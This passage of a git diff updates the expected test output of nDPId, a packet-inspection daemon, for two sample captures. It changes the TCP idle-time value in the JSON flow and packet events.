Garron Torres, CN=*.badssl.com","alpn":"http\/1.1","fingerprint":"18:45:B2:16:EF:D0:83:9A:18:51:A9:57:32:5D:A3:36:21:70:49:CB"}} 
+00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1620643422034,"flow_last_seen":1620643422754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":4010,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1620643422754,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","packets-captured":21,"packets-processed":21,"total-skipped-flows":0,"total-l4-data-len":4010,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1620643422754} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 21/21 diff --git a/test/results/starcraft_battle.pcap.out b/test/results/starcraft_battle.pcap.out index 0940ae948..66e288542 100644 --- a/test/results/starcraft_battle.pcap.out +++ b/test/results/starcraft_battle.pcap.out 
@@ -1,8 +1,8 @@ 00467{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"starcraft_battle.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1437389953643} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953643,"flow_last_seen":1437389953643,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1437389953643,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437389953643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1437389953643,"pkt":"IImEa8W6hCYVPnXECABFAABHZtpAAPMGok\/AHvxbwKgBZAG7DI12Mx9qhBzaXVAYAB\/+XQAAFwMDABrSe+rfqh1HHm09zJFdvf5O5AwaBTHDWE16Zg=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437389953643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1437389953643,"pkt":"hCYVPnXEIImEa8W6CABFAABLZZBAAIAGFpbAqAFkwB78WwyNAbuEHNpddjMfiVAYAP4NnAAAFwMDAB4AAAAAAAAAE\/\/36Dj9UZVbiDpZWB\/\/4P+7KR1Y0OI="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953643,"flow_last_seen":1437389953643,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1437389953643,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437389953643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1437389953643,"pkt":"IImEa8W6hCYVPnXECABFAABHZtpAAPMGok\/AHvxbwKgBZAG7DI12Mx9qhBzaXVAYAB\/+XQAAFwMDABrSe+rfqh1HHm09zJFdvf5O5AwaBTHDWE16Zg=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437389953643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1437389953643,"pkt":"hCYVPnXEIImEa8W6CABFAABLZZBAAIAGFpbAqAFkwB78WwyNAbuEHNpddjMfiVAYAP4NnAAAFwMDAB4AAAAAAAAAE\/\/36Dj9UZVbiDpZWB\/\/4P+7KR1Y0OI="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437389953741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389953741,"pkt":"hCYVPnXEIImEa8W6CABFAABIX14AAIARVpTAqAFkwKgB\/uXCADUANEsbLmwBAAABAAAAAAAAAjkxAzI1MgIzMAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"91.252.30.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -10,9 +10,9 @@ 00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389953741,"flow_last_seen":1437389953742,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953742,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437389953743,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1437389953743,"pkt":"IImEa8W6hCYVPnXECABFAABcAABAAEARtd7AqAH+wKgBZAA15cIASF7P6I+BgAABAAEAAAAAAzEwMAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAHADAAMAAEAAAAAAAgGbmItd2luAA=="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953741,"flow_last_seen":1437389953743,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389953743,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437389953774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389953774,"pkt":"IImEa8W6hCYVPnXECABFAAAoZttAAPMGom3AHvxbwKgBZAG7DI12Mx+JhBzagFAQAB8ujQAAAAAAAAAA"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389954123,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389954123,"pkt":"IImEa8W6hCYVPnXECABFAAAohUoAAPMGdW9Q77oawKgBZAG7DZT7ZyHlrZYt91AU9s3jwgAAAAAAAAAA"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437389953774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389953774,"pkt":"IImEa8W6hCYVPnXECABFAAAoZttAAPMGom3AHvxbwKgBZAG7DI12Mx+JhBzagFAQAB8ujQAAAAAAAAAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389954123,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437389954123,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389954123,"pkt":"IImEa8W6hCYVPnXECABFAAAohUoAAPMGdW9Q77oawKgBZAG7DZT7ZyHlrZYt91AU9s3jwgAAAAAAAAAA"} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437389954543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389954543,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2AAAIARVpLAqAFkwKgB\/uXPADUANOzD5FkBAAABAAAAAAAAAzI1NAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -21,8 +21,8 @@ 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437389954544,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389954544,"pkt":"IImEa8W6hCYVPnXECABFAABIAABAAEARtfLAqAH+wKgBZAA15c8ANGxA5FmBgwABAAAAAAAAAzI1NAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389954543,"flow_last_seen":1437389954544,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954544,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389954714,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"26.186.239.80.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389955642,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389955642,"pkt":"IImEa8W6hCYVPnXECABFAAAo31oAAPMGG1FQ77oowKgBZAG7DZa8aq6WRaVMa1AU+bLclgAAAAAAAAAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389955642,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437389955642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389955642,"pkt":"IImEa8W6hCYVPnXECABFAAAo31oAAPMGG1FQ77oowKgBZAG7DZa8aq6WRaVMa1AU+bLclgAAAAAAAAAA"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955670,"flow_last_seen":1437389955670,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1437389955670,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1437389955670,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1437389955670,"pkt":"IImEa8W6hCYVPnXECABFAABFcNYAADURfO2twigWwKgBZAG70UAAMRxxEMkFXwBmE17ybHuJOXq3nhBj9+0\/GMWhnexwnqL3\/n6xqnftvooLDz8="} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1437389955696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1437389955696,"pkt":"hCYVPnXEIImEa8W6CABFAABFDD0AAIARlobAqAFkrcIoFtFAAbsAMXj5DBnPzxTN69maKsxX+B31W\/+0ERxkBS+pEu\/Lu7MhCuhfcS4mTXYS47w="} 
@@ -31,9 +31,9 @@ 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1437389955800,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1437389955800,"pkt":"IImEa8W6hCYVPnXECABFAABuAABAAEARtczAqAH+wKgBZAA15dwAWs2+izyBgAABAAEAAAAAAjQwAzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAHADAAMAAEAAC+XABoNODAtMjM5LTE4Ni00MAZhdHRlbnMDbmV0AA=="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389955800,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955932,"flow_last_seen":1437389955932,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389955932,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1437389955932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389955932,"pkt":"hCYVPnXEIImEa8W6CABFAAApUQNAAIAGOxbAqAFk2DrUbgvsAbu4rIxVQhQWM1AQAPyVMQAAAA=="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1437389955967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389955967,"pkt":"IImEa8W6hCYVPnXECABFAAA0zAIAADUGSwzYOtRuwKgBZAG7C+xCFBYzuKyMVoAQAofTiQAAAQEFCrisjFW4rIxW"} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955932,"flow_last_seen":1437389955932,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389955932,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1437389955932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389955932,"pkt":"hCYVPnXEIImEa8W6CABFAAApUQNAAIAGOxbAqAFk2DrUbgvsAbu4rIxVQhQWM1AQAPyVMQAAAA=="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1437389955967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389955967,"pkt":"IImEa8W6hCYVPnXECABFAAA0zAIAADUGSwzYOtRuwKgBZAG7C+xCFBYzuKyMVoAQAofTiQAAAQEFCrisjFW4rIxW"} 
